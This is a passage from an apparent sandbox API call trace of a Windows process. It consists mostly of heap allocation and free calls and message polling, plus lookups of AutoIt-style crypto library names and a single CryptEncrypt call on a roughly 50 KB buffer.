0x2e54378 [0250.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0250.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0250.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.678] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.678] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0250.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.678] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.679] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0250.679] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0250.679] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.679] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.679] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0250.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.679] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0250.680] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.680] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.681] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0250.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51a78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0250.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0250.681] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0250.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0250.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54418 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0250.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0250.682] CryptEncrypt (in: hKey=0xa876d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xc4dc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xc4e0) returned 1 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0250.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0250.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0250.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0250.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0250.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0250.685] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0250.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0250.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0250.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0250.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0250.687] CharLowerBuffW (in: lpsz="byte[50400]", cchLength=0xb | out: lpsz="byte[50400]") returned 0xb [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0250.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 